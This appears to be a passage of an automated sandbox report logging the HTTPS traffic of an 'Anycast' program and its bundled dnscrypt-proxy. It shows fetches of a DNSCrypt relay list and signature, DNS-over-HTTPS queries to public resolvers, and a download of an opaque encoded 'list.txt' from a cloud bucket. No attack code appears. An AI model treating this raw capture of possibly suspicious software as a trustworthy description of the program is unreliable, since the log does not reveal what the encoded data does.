                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 41 32 4e 43 34 78 4d 6a 41 75 4e 53 34 79 4e 54 45 36 4e 44 51 7a 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 73 65 72 62 69 61 0a 0a 42 65 6c 67 72 61 64 65 2c 20 53 65 72 62 69 61 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 49 7a 4e 79 34 78 4d 6a 41 75 4d 54 6b 7a 4c 6a 49 78 4f 54 6f 30 4e 44 4d 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 73 69 6e 67 61 70 6f 72 65 0a 0a 53 69 6e 67 61 70 6f 72 65 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65 64 20
                                                                                                                            Data Ascii: ptostorm.is/sdns://gRA2NC4xMjAuNS4yNTE6NDQz## anon-cs-serbiaBelgrade, Serbia Anonymized DNS relay server provided by https://cryptostorm.is/sdns://gRIzNy4xMjAuMTkzLjIxOTo0NDM## anon-cs-singaporeSingapore Anonymized DNS relay server provided
                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 6f 30 4e 44 4d 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 63 73 2d 76 61 6e 63 6f 75 76 65 72 0a 0a 56 61 6e 63 6f 75 76 65 72 2c 20 43 61 6e 61 64 61 20 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 73 65 72 76 65 72 20 70 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 73 74 6f 72 6d 2e 69 73 2f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 41 33 4d 53 34 78 4f 53 34 79 4e 54 45 75 4d 7a 51 36 4e 44 51 7a 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 64 6e 73 63 72 79 70 74 2e 75 6b 2d 69 70 76 34 0a 0a 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 69 6e 20 4c 6f 6e 64 6f 6e 2e 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6e 73 63 72 79 70 74 2e 75 6b 0a 0a 73 64 6e 73 3a 2f 2f 67 51 30 78 4e 6a 55 75 4d 6a 4d 79 4c 6a 4d 79 4c 6a
                                                                                                                            Data Ascii: o0NDM## anon-cs-vancouverVancouver, Canada Anonymized DNS relay server provided by https://cryptostorm.is/sdns://gRA3MS4xOS4yNTEuMzQ6NDQz## anon-dnscrypt.uk-ipv4Anonymized DNS relay in London. https://www.dnscrypt.uksdns://gQ0xNjUuMjMyLjMyLj
                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 2d 67 6f 6d 62 61 64 69 2d 73 79 64 6e 65 79 2d 69 70 76 36 0a 0a 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 68 6f 73 74 65 64 20 69 6e 20 53 79 64 6e 65 79 20 41 75 73 74 72 61 6c 69 61 2e 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6d 62 61 64 69 2e 63 6f 6d 2f 65 64 6e 73 2f 65 64 6e 73 2e 68 74 6d 6c 0a 0a 73 64 6e 73 3a 2f 2f 67 53 52 62 4d 6a 51 77 4d 44 6f 34 4f 54 41 33 4f 6a 70 6d 4d 44 4e 6a 4f 6a 6b 7a 5a 6d 59 36 5a 6d 56 6a 4e 44 6f 34 59 7a 51 79 58 54 6f 30 4e 44 4d 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 67 6f 6d 62 61 64 69 2d 74 6f 6b 79 6f 0a 0a 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 68 6f 73 74 65 64 20 69 6e 20 54 6f 6b 79 6f 20 4a 61 70 61 6e 2e 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6d 62
                                                                                                                            Data Ascii: -gombadi-sydney-ipv6Anonymized DNS relay hosted in Sydney Australia. https://www.gombadi.com/edns/edns.htmlsdns://gSRbMjQwMDo4OTA3OjpmMDNjOjkzZmY6ZmVjNDo4YzQyXTo0NDM## anon-gombadi-tokyoAnonymized DNS relay hosted in Tokyo Japan. https://www.gomb
                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 20 44 4e 53 20 72 65 6c 61 79 20 63 6f 6c 6f 63 61 74 65 64 20 61 74 20 53 6f 6e 69 63 2e 6e 65 74 20 69 6e 20 53 61 6e 74 61 20 52 6f 73 61 2c 20 43 41 20 69 6e 20 74 68 65 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 2e 20 50 72 6f 76 69 64 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 69 6e 74 65 72 6e 65 74 2e 69 6f 0a 0a 73 64 6e 73 3a 2f 2f 67 52 45 33 4d 43 34 7a 4e 69 34 78 4e 7a 41 75 4d 54 49 32 4f 6a 51 30 4d 77 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 73 61 6c 64 6e 73 30 31 2d 63 6f 6e 6f 68 61 2d 69 70 76 34 0a 0a 48 6f 73 74 65 64 20 6f 6e 20 43 6f 6e 6f 48 61 20 56 50 53 20 54 6f 6b 79 6f 20 72 65 67 69 6f 6e 2e 20 4e 6f 20 6c 6f 67 2e 20 46 72 6f 6d 20 65 78 70 65 72 69 6d 65 6e 74 61 6c 20 5b 26 6d 75 3b 4f 44 4e 53 20 70 72 6f 6a 65 63 74
                                                                                                                            Data Ascii: DNS relay colocated at Sonic.net in Santa Rosa, CA in the United States. Provided by https://openinternet.iosdns://gRE3MC4zNi4xNzAuMTI2OjQ0Mw## anon-saldns01-conoha-ipv4Hosted on ConoHa VPS Tokyo region. No log. From experimental [&mu;ODNS project
                                                                                                                            2024-03-12 15:32:19 UTC1378INData Raw: 65 72 64 61 6d 20 61 6e 64 20 6d 61 69 6e 74 61 69 6e 65 64 20 62 79 20 46 72 61 6e 6b 20 44 65 6e 69 73 20 28 40 6a 65 64 69 73 63 74 31 29 2e 0a 49 50 76 36 20 6f 6e 6c 79 2e 20 52 75 6e 6e 69 6e 67 20 6f 6e 20 61 6e 20 69 6e 73 74 61 6e 63 65 20 64 6f 6e 61 74 65 64 20 62 79 20 68 74 74 70 73 3a 2f 2f 73 63 61 6c 65 77 61 79 2e 63 6f 6d 0a 0a 73 64 6e 73 3a 2f 2f 67 52 5a 62 4d 6a 41 77 4d 54 70 69 59 7a 67 36 4d 54 67 7a 4d 44 70 69 4d 44 63 36 4f 6a 46 64 0a 0a 0a 23 23 20 61 6e 6f 6e 2d 73 65 72 62 69 63 61 0a 0a 41 6e 6f 6e 79 6d 69 7a 65 64 20 44 4e 53 20 72 65 6c 61 79 20 68 6f 73 74 65 64 20 69 6e 20 4e 65 74 68 65 72 6c 61 6e 64 73 20 62 79 20 68 74 74 70 73 3a 2f 2f 6c 69 74 65 70 61 79 2e 63 68 0a 0a 73 64 6e 73 3a 2f 2f 67 52 4d 78 4f 44 55
                                                                                                                            Data Ascii: erdam and maintained by Frank Denis (@jedisct1).IPv6 only. Running on an instance donated by https://scaleway.comsdns://gRZbMjAwMTpiYzg6MTgzMDpiMDc6OjFd## anon-serbicaAnonymized DNS relay hosted in Netherlands by https://litepay.chsdns://gRMxODU


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.549716185.199.109.1334437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:20 UTC160OUTGET /DNSCrypt/dnscrypt-resolvers/master/v2/relays.md.minisig HTTP/1.1
                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:32:20 UTC890INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 297
                                                                                                                            Cache-Control: max-age=300
                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                            ETag: "e7f4d89a683a78351eff9d18760af1b3265ddcedc6b19c1ede823ed70e464c92"
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: deny
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-GitHub-Request-Id: 88F6:48C1:B6C6C1:E0C3E8:65F02E68
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:20 GMT
                                                                                                                            Via: 1.1 varnish
                                                                                                                            X-Served-By: cache-lga21959-LGA
                                                                                                                            X-Cache: HIT
                                                                                                                            X-Cache-Hits: 1
                                                                                                                            X-Timer: S1710257540.245700,VS0,VE22
                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                            X-Fastly-Request-ID: 1d110076987caaf2fbdd1de1a7c9afa2e650ccbc
                                                                                                                            Expires: Tue, 12 Mar 2024 15:37:20 GMT
                                                                                                                            Source-Age: 22
                                                                                                                            2024-03-12 15:32:20 UTC297INData Raw: 75 6e 74 72 75 73 74 65 64 20 63 6f 6d 6d 65 6e 74 3a 20 73 69 67 6e 61 74 75 72 65 20 66 72 6f 6d 20 6d 69 6e 69 73 69 67 6e 20 73 65 63 72 65 74 20 6b 65 79 0a 52 57 51 66 36 4c 52 43 47 41 39 69 35 32 50 4d 73 54 32 7a 78 55 76 52 31 59 70 69 45 79 49 34 6f 6a 30 72 7a 30 59 78 51 73 34 74 35 74 75 79 76 33 45 6f 4f 55 68 56 79 75 4f 48 78 77 4a 71 6f 43 6e 6a 4b 43 43 67 38 65 71 41 63 71 43 2b 68 4a 6c 59 48 5a 42 4f 74 30 67 35 7a 42 4c 6c 30 67 49 3d 0a 74 72 75 73 74 65 64 20 63 6f 6d 6d 65 6e 74 3a 20 74 69 6d 65 73 74 61 6d 70 3a 31 37 30 39 34 38 39 33 35 35 09 66 69 6c 65 3a 72 65 6c 61 79 73 2e 6d 64 0a 61 2f 54 6e 61 75 73 48 57 55 53 4a 52 56 4c 63 63 4c 2b 55 61 2f 52 54 6b 31 43 6c 53 57 64 4f 5a 57 59 73 39 68 73 74 34 61 42 2f 70 6e 71
                                                                                                                            Data Ascii: untrusted comment: signature from minisign secret keyRWQf6LRCGA9i52PMsT2zxUvR1YpiEyI4oj0rz0YxQs4t5tuyv3EoOUhVyuOHxwJqoCnjKCCg8eqAcqC+hJlYHZBOt0g5zBLl0gI=trusted comment: timestamp:1709489355file:relays.mda/TnausHWUSJRVLccL+Ua/RTk1ClSWdOZWYs9hst4aB/pnq


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.549720185.150.99.2554437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:27 UTC204OUTGET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABCTkjVodOxrEqOJKzoqINSq HTTP/1.1
                                                                                                                            Host: doh.ffmuc.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:32:27 UTC286INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:27 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=47076
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Allow-Methods: GET, POST
                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                            2024-03-12 15:32:27 UTC468INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 b7 e4 00 14 01 6d 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 b7 e4 00 04 01 66 c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 69 c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 67 c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 62 c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 6c c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 61 c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 6b c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 68 c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 63 c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 6a c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 64 c0 1e 00 00 02 00 01 00 00 b7 e4 00 04 01 65 c0 1e 00 00 29 02 00 00 00 00 00 00 e5 00 0c 00 e1 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: mroot-serversnetfigblakhcjde)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.549721185.150.99.2554437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:28 UTC246OUTGET /dns-query?dns=yv4BAAABAAAAAAABEHB0bWVkZHRndHNmZHFwd2YEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQK5V0BBhEBZ8Md1B7OJ0HFA HTTP/1.1
                                                                                                                            Host: doh.ffmuc.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:32:28 UTC286INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:28 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=86290
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Allow-Methods: GET, POST
                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                            2024-03-12 15:32:28 UTC468INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 70 74 6d 65 64 64 74 67 74 73 66 64 71 70 77 66 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 01 51 12 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 02 00 00 00 00 00 01 4e 00 0c 01 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: ptmeddtgtsfdqpwftestdnscryptQ@aroot-serversnetnstldverisign-grscomxC:Q)NJ


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.5497269.9.9.104437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:41 UTC276OUTPOST /dns-query?body_hash=2d65b93645064218288e55ae10d8eae180b162f57527a4b5a99876168346e6b9 HTTP/1.1
                                                                                                                            Host: dns10.quad9.net:443
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:32:41 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 30 56 33 b3 ee 4c fb dc 7e e4 2a 62 6d fe 55 5c
                                                                                                                            Data Ascii: )0V3L~*bmU\
                                                                                                                            2024-03-12 15:32:41 UTC186INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:41 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 239
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=21260
                                                                                                                            2024-03-12 15:32:41 UTC239INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 53 0c 00 14 01 6b 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 53 0c 00 04 01 68 c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 62 c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 6c c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 64 c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 65 c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 69 c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 63 c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 66 c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 61 c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 67 c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 6a c0 1e 00 00 02 00 01 00 00 53 0c 00 04 01 6d c0 1e 00 00 29 02 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: Skroot-serversnetShSbSlSdSeSiScSfSaSgSjSm)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.5497279.9.9.104437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:42 UTC276OUTPOST /dns-query?body_hash=562fc4fdf362a1d97002ab65a36c53ff2fb288c59a21ce099852d168c5ce59f5 HTTP/1.1
                                                                                                                            Host: dns10.quad9.net:443
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:32:42 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 65 63 76 66 63 64 73 79 65 6a 75 6f 76 61 70 75 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 84 7a 3c b2 7d 61 22 e2 fb b8 e3 e7 42 bb a0 16
                                                                                                                            Data Ascii: ecvfcdsyejuovaputestdnscrypt)z<}a"B
                                                                                                                            2024-03-12 15:32:42 UTC184INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:42 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 134
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=372
                                                                                                                            2024-03-12 15:32:42 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 65 63 76 66 63 64 73 79 65 6a 75 6f 76 61 70 75 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 01 74 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: ecvfcdsyejuovaputestdnscryptt@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.549730101.101.101.1014437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:43 UTC269OUTPOST /dns-query?body_hash=b6a4d160e3f7779591b17a40f7957877095f768e0bc5c301bce81f0994efe405 HTTP/1.1
                                                                                                                            Host: dns.twnic.tw
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:32:43 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 63 b3 fc 12 3f 9e d6 96 1c 85 90 ea a3 ce 0d b5
                                                                                                                            Data Ascii: )c?
                                                                                                                            2024-03-12 15:32:44 UTC530INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:44 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 1471
                                                                                                                            Connection: close
                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                            Access-Control-Allow-Methods: GET, HEAD, OPTIONS, POST
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Max-Age: 3600
                                                                                                                            Cache-Control: private, max-age=128
                                                                                                                            Expires: Tue, 12 Mar 2024 15:34:52 GMT
                                                                                                                            Last-Modified: Tue, 12 Mar 2024 15:32:44 GMT
                                                                                                                            Vary: Accept
                                                                                                                            X-Powered-By: DNS-over-HTTPS/2.3.1 (+https://github.com/m13253/dns-over-https)
                                                                                                                            2024-03-12 15:32:44 UTC1471INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 1b 00 00 02 00 01 00 00 02 00 01 00 00 29 ea 00 14 01 6c 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 29 ea 00 14 01 6d 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 29 ea 00 14 01 6a 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 29 ea 00 14 01 66 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 29 ea 00 14 01 62 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 29 ea 00 14 01 63 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 29 ea 00 14 01 6b 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 29 ea 00 14 01 67 0c 72 6f 6f 74 2d 73 65
                                                                                                                            Data Ascii: )lroot-serversnet)mroot-serversnet)jroot-serversnet)froot-serversnet)broot-serversnet)croot-serversnet)kroot-serversnet)groot-se


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.549731170.106.97.1944437824C:\Program Files (x86)\Anycast\Anycast.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:43 UTC129OUTGET /list.txt HTTP/1.1
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: list-cn-1304018649.cos.accelerate.myqcloud.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-03-12 15:32:44 UTC357INHTTP/1.1 200 OK
                                                                                                                            Content-Type: text/plain
                                                                                                                            Content-Length: 128
                                                                                                                            Connection: close
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:44 GMT
                                                                                                                            ETag: "7924111bdf1541b328aba57d26ae8ceb"
                                                                                                                            Last-Modified: Tue, 25 Apr 2023 06:05:59 GMT
                                                                                                                            Server: tencent-cos
                                                                                                                            x-cos-hash-crc64ecma: 15979793593188068610
                                                                                                                            x-cos-request-id: NjVmMDc1OWJfMTFlZjVlMGJfYjNlZl9iMDQ4ZjEz
                                                                                                                            2024-03-12 15:32:44 UTC128INData Raw: 6e 6f 34 69 66 66 43 62 6b 4b 67 79 56 32 67 74 4c 55 76 53 54 53 4e 35 6c 2f 35 42 71 56 71 72 57 32 6b 32 37 30 59 44 4e 73 49 65 64 62 59 69 6f 6f 63 5a 6c 6f 72 63 39 2f 4e 59 6f 54 70 6f 49 30 48 4d 62 51 6c 65 37 47 43 47 72 38 6a 56 55 4d 4c 36 74 79 63 50 69 50 59 4d 44 32 73 30 4f 49 4f 74 72 79 4b 2b 7a 4f 4d 34 77 38 42 71 76 6c 31 6a 69 4c 65 5a 62 4f 57 4b 70 35 36 4a
                                                                                                                            Data Ascii: no4iffCbkKgyV2gtLUvSTSN5l/5BqVqrW2k270YDNsIedbYioocZlorc9/NYoTpoI0HMbQle7GCGr8jVUML6tycPiPYMD2s0OIOtryK+zOM4w8Bqvl1jiLeZbOWKp56J


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.549732101.101.101.1014437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:45 UTC269OUTPOST /dns-query?body_hash=8bdeba34ad55cd6e75aa87807f8a3e0c4d5f547116c8f435f96ce5539bf7bd4c HTTP/1.1
                                                                                                                            Host: dns.twnic.tw
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:32:45 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 77 74 74 78 6b 65 71 69 75 62 6c 7a 66 62 75 6b 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 78 73 a2 af 41 58 17 31 43 31 ee e7 ac 15 1e c9
                                                                                                                            Data Ascii: wttxkeqiublzfbuktestdnscrypt)xsAX1C1
                                                                                                                            2024-03-12 15:32:45 UTC531INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:32:45 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 134
                                                                                                                            Connection: close
                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                            Access-Control-Allow-Methods: GET, HEAD, OPTIONS, POST
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Max-Age: 3600
                                                                                                                            Cache-Control: private, max-age=61512
                                                                                                                            Expires: Wed, 13 Mar 2024 08:37:57 GMT
                                                                                                                            Last-Modified: Tue, 12 Mar 2024 15:32:45 GMT
                                                                                                                            Vary: Accept
                                                                                                                            X-Powered-By: DNS-over-HTTPS/2.3.1 (+https://github.com/m13253/dns-over-https)
                                                                                                                            2024-03-12 15:32:45 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 77 74 74 78 6b 65 71 69 75 62 6c 7a 66 62 75 6b 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 f0 48 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: wttxkeqiublzfbuktestdnscryptH@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.549735172.64.134.394437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:32:47 UTC275OUTPOST /dns-query?body_hash=3f04eee6df6620309f27051f2f0154112b35c050363b636ddaf17d1a044ff8ec HTTP/1.1
                                                                                                                            Host: sky.rethinkdns.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
